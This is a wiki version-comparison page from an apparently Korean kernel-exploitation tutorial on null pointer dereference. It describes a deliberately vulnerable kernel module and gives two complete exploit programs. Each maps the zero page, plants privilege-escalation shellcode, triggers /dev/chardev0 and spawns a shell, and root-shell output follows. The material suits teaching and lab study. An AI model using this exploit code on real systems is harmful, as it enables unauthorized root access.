Versions Compared

Old Version 3

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version Current

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Info
title0-address protection

...

Example

...

Source code of module

  • 해당 코드는 04.Creating a kernel module to privilege escalation 의 escalation.c 코드를 일부 수정하였으며, 변경된 코드는 다음과 같습니다.

    • Null pointer dereference를 구현하기 위해 포인터 함수를 선언합니다.

      • void (*myFunPtr)(void);

    • 해당 함수는 chardev_write() 함수에서 호출하고 종료됩니다.

      • myFunPtr 함수를 호출하기 전에 해당 함수에 별도의 값이 설정되지 않았기 때문에, myFunPtr함수를 호출하게되면 0x0 영역을 호출하게 됩니다.

...

Code Block
languagecpp
titlepocexploit.c
//gcc -static -o exploit exploit.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>

char payload[] = "\x31\xc0\xe8\x19\x2e\x08\xc1\xe8\x54\x2b\x08\xc1\xc3";
 
int main(){
 
    char *addr = mmap(0, 4096,PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,-1, 0);
 
    if(addr != 0){
        printf("[*]Unable to map zero page.\n");
        exit(-1);
    }
 
    printf("[*] Mapped zero page.\n");
    memcpy(0, payload, sizeof(payload));
 
    int fd = open("/dev/chardev0", O_WRONLY);
    if(0 < fd){
        write(fd, "AAAA", 4);
        system("sh");
    }else{
        printf("Failed to open file.\n");
    }
     
    return 0;
}
Code Block
titleGet shell
lazenca0x0@ubuntu:~/Kernel/Exploit/Null$ ./testexploit
[*] Mapped zero page.
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux
#

...

Code Block
languagecpp
titlepocexploit.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>

char payload[] = "\x48\x31\xff\xe8\x38\xda\x09\x81\x48\x97\xe8\x51\xd7\x09\x81\xc3";
 
int main(){
 
    char *addr = mmap(0, 4096,PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,-1, 0);
 
    if(addr != 0){
        printf("[*]Unable to map zero page.\n");
        exit(-1);
    }
 
    printf("[*] Mapped zero page.\n");
    memcpy(0, payload, sizeof(payload));
 
    int fd = open("/dev/chardev0", O_WRONLY);
    if(0 < fd){
        write(fd, "AAAA", 4);
		system("/bin/sh");
    }else{
        printf("Failed to open file.\n");
    }
     
    return 0;
}
Code Block
titleGet shell
lazenca0x0@ubuntu:~/Kernel/Exploit/Null$ ./pocexploit
[*] Mapped zero page.
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
#

...